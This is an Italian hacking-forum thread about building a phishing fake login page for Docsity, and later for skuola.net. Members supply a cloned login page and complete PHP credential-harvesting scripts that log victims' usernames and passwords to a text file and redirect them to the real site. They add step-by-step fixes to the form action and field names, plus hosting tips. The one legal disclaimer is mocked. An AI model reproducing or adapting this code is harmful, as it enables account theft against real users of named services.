Domanda Phishing: Fake login sito web Docsity

Stato
Discussione chiusa ad ulteriori risposte.

HotDog01

Utente Bronze
24 Giugno 2017
92
19
0
43
Sapete dirmi come si fa a creare un fake login della pagina di accesso a Docsity?
sito web: https://www.docsity.com/it/utenti/login/
E inoltre dove posso trovare un mail sender che permetti di:
- inviare mail anche nella casella di gmail senza che questa venga ricevuta in spam o che non venga proprio ricevuta (mail da inviare alla vittima)
- mettendo come indirizzo email del mittente quella che voglio io
Considerate che non ho kali-linux e non riesco nemmeno a implementarlo nei mio computer
Grazie
 
- inviare mail anche nella casella di gmail senza che questa venga ricevuta in spam o che non venga proprio ricevuta (mail da inviare alla vittima)
- mettendo come indirizzo email del mittente quella che voglio io

Questi due punti si autoescludono. Puoi avere solo una delle due cose.

Fare il fakelogin non e' difficile almeno per l'opzione email/password ma non riuscirai a gestire l'accesso con google o facebook con altrettanta facilita'.
 
vabbè allora mi accontento anche solo del primo, basta sapere come creare il fake login

Ti serve una mail vera, poi puoi automatizzare l'invio con qualcosa come PHPMailer configurato con SMTP.
Ti allego la pagina html standalone da usare come base per il fake.
 

Allegati

  • fake.zip
    187.3 KB · Visualizzazioni: 34
Grazie mille, per il php invece come posso creare il codice? perché pensavo di caricare tutti questi file su 000webhost
 
Ti ho dato la base (99%) e non tutto completo per spingerti a fare un minimo di ricerca, se davvero ci tieni non ci starai molto a scrivere le 4 righe di PHP che mancano, anche a colpi di google.
 
  • Mi piace
Reazioni: 0xbro
Ultima modifica:
guardando da dei video tutorial, il codice php veniva già creato dall’utente(bastava scaricarlo) e quindi non so proprio come farlo...inoltre se non erro bisognava sostituire un pezzo di codice con “post.php” per far riferimento al file “post.php”, quindi non saprei come fare
Messaggio unito automaticamente:

Se seguo questa guida, utilizzando il codice php che dà l’utente, ho speranze di riuscire?:
Messaggio unito automaticamente:

Ho capito che nel codice html devi sostituire la stringa presente dopo “action=“ con l’indirizzo del tuo sito altervista, solo che nel codice che mi hai dato non c’è ...
 
Il parametro action manca, devi aggiungerlo tu a riga 62 nell'elemento form.
Quella guida fa abbastanza schifo ma dovrebbe funzionare lo stesso perche' devi prendere d'esempio solo il codice PHP, devi cambiare ovviamente i parametri che prende da $ _POST in modo da farli coincidere con i name dell'HTML (nella guida che hai postato li fa coincidere con l'id infatti non funziona neanche con il suo esempio).
 
Allora ho aggiunto subito dopo ”form” la scritta “action=post.php”, però non ho capito come modificare i parametri del php, non è per niente chiaro...Non riesci a spiegarmi meglio in che modo modifica i parametri?
grazie
 
Ok... pensavo ci arrivassi, action puoi anche non metterlo, metti in cima queste quattro righe e cambia l'estensione del file in .php
PHP:
<?php
if (isset($_POST['username'])) {
    $usr = $_POST['username']; $pwd = $_POST['password'];
    $h = fopen('dati.txt', 'a+');
    $log = date("Y-m-d H:i");
    $log = "[$log] $usr:$pwd\r\n";
    fwrite($h, $log);
    fclose($h);
    die(header("Location: https://redirect.a.questo.sito.com/"));
}
?>
<!-- il resto di fake.html -->
 
basta fare copia e incolla della sorgente metterla su altervista e con un file php impostare la recezione dei dati di login in seguito il reindirizzamento sul sito originale.

$n = $_POST['nome'];
$p = $_POST['pass'];
$dati = "Username: ";
$dati .= $n;
$dati .= " - Password: ";
$dati .= $p;
$dati .= "\n\n";
$var=fopen("blocco.txt","a");
fwrite($var,$dati);
fclose($var);
header("location: https://ilsitochetipare.com")

al posto di Username e Password va inserito l'input che nel tuo caso nei dati sarebbe al posto di Username "Username o email" e password rimane "Password"

Solo a scopo informativo non mi assumo la responsabilità di ciò che tu faccia e aggiungo:
eseguire questa procedura potrebbe portarti a una denuncia, in oltre i siti su cui hosterai questo metodo ES. Altervista ti bloccheranno l'account e in oltre avviseranno le autorità responsabili
 
basta fare copia e incolla della sorgente metterla su altervista e con un file php impostare la recezione dei dati di login in seguito il reindirizzamento sul sito originale.

$n = $_POST['nome'];
$p = $_POST['pass'];
$dati = "Username: ";
$dati .= $n;
$dati .= " - Password: ";
$dati .= $p;
$dati .= "\n\n";
$var=fopen("blocco.txt","a");
fwrite($var,$dati);
fclose($var);
header("location: https://ilsitochetipare.com")

al posto di Username e Password va inserito l'input che nel tuo caso nei dati sarebbe al posto di Username "Username o email" e password rimane "Password"

Solo a scopo informativo non mi assumo la responsabilità di ciò che tu faccia e aggiungo:
eseguire questa procedura potrebbe portarti a una denuncia, in oltre i siti su cui hosterai questo metodo ES. Altervista ti bloccheranno l'account e in oltre avviseranno le autorità responsabili
ma smettila haha altervista se ne fotte le palle
 
Ultima modifica:
Non ho capito cosa cambia il codice php di @cinodertoten da quello di @JunkCoder ? quindi posso fare la pagina di fake login con qualsiasi servizio, utilizzando il php di @cinodertoten ?
Grazie

Cambia che il suo non e' per docsity, non so a quale servizio si riferisca con "nome" e "pass". Quello di docsity invia "username" e "password".
Per farne uno generico per qualunque fake il codice e' altro, nessuno dei due fa questo.
Come altra differenza il mio scrive nel file in questo formato:
Codice:
[2020-10-06 15:05] username1:password123
[2020-10-06 17:05] username2:password321

Il suo (se corretti i parametri post) :
Codice:
Username: username1 - Password: password123

Username: username2 - Password: password321

PS: il suo senza l'if non puo' essere incluso nella stessa pagina, va messo in un altra e va aggiunto action nel form per indirizzare li' i dati. Se lo metessi nella stessa pagina creerebbe delle entry vuote, mostrando un warning (o notice) di PHP in cima alla pagina.
 
Intendevo questo con name e pass
Name.jpg
Pass.jpg
 
quindi se per esempio volessi fare una pagina di fake login di skuola.net (https://www.skuola.net/utente/login) cosa dovrei variare nei codici che mi avete proposto?
ovviamente il codice html è totalmente diverso, ma mi basta fare un copia incolla della sorgente pagina; il problema resta il codice php...
 
Stato
Discussione chiusa ad ulteriori risposte.